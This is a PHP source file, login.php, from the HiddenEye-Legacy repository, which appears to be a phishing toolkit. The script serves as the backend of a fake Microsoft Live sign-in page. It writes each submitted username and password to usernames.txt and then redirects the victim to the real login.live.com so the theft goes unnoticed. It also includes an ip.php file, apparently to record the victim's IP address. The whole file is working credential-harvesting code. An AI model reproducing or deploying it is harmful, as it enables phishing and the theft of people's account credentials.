HiddenEye-Legacy/WebPages/live_web/login.php
Usama Abdul Sattar 2320d865fc
Update login.php
2018-06-07 14:22:59 +05:00

8 lines
222 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: http://login.live.com/');
exit();